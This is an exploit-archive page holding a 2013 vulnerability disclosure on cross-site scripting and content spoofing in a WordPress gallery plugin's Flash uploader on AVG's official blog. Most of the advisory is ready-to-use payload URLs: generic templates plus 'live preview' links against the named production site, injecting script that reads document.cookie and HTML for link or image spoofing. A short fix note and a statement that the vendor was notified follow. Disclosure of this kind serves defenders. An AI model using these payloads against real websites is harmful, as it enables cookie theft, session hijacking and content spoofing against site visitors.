what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AVG Official Blog Cross Site Scripting

AVG Official Blog Cross Site Scripting
Posted Jun 7, 2013
Authored by Ryuzaki Lawlet

The AVG official blog suffers from a cross site scripting vulnerability. The author has notified AVG of the issue.

tags | exploit, xss
SHA-256 | 63bca005b71bc8e4a0bc101bcf83fed62c7bd61e1ea93aa6f7d05d71cc1c029c

AVG Official Blog Cross Site Scripting

Change Mirror Download
#########################################################
# Title : Cross Site Scripting in AVG Official Blog
# Author : Ryuzaki Lawlet
# Blog  : justryuz.blogspot.com / www.justryuz.com
# E-mail : ryuzaki_l@y7mail.com / justryuz@facebook.com / justryuz@linuxmail.org
# Date: 6/5/2013 (4.44 pm)
# Vendor: http://wordpress.org/plugins/nextgen-gallery/
# Type : Web Apps
# Vector of operation: Remote
# Impact: Cross Site Scripting & Content Spoofing
# Tested on : Ubuntu / Window XP
##########################################################

*Description:

The vulnerability is caused due to insufficient input validation in the parameter
“movieName” and "buttonText" in the script to swfupload.swf “ExternalInterface.call ()”. This can be
exploited to execute arbitrary HTML and script code in a user’s browser session in
context of an affected site.

There are two vulnerabilities in AVG Official Blog.
------->
Exploit

*Content Spoofing

http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>

It's possible to inject text, images and html (e.g. for link injection).

*Cross-Site Scripting

http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>

Code will execute after click. It's strictly social XSS.

*Proof of Concept Code

http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=[XSS]
http://[victim]/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swfbuttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>

*Live Preview
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert("xss");//
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://blog.avg.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=testbuttonText=test<img src='http://i.imgur.com/ltp2L8N.jpg'>


<------

Screenshot:
http://i.imgur.com/A4rKq0Q.jpg

*Solution:
On the server side, you can upgrade to a non-vulnerable version. On the client
you can use a browser that obeys the Content-Type header specified by the server, such as Mozilla Firefox, Google Chrome, Apple Safari or Opera.
Internet Explorer 8 with the XSS Filter won't execute the malicious scripts.

Reff: http://justryuz.blogspot.com/2013/05/cross-site-scripting-in-avg-official.html
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close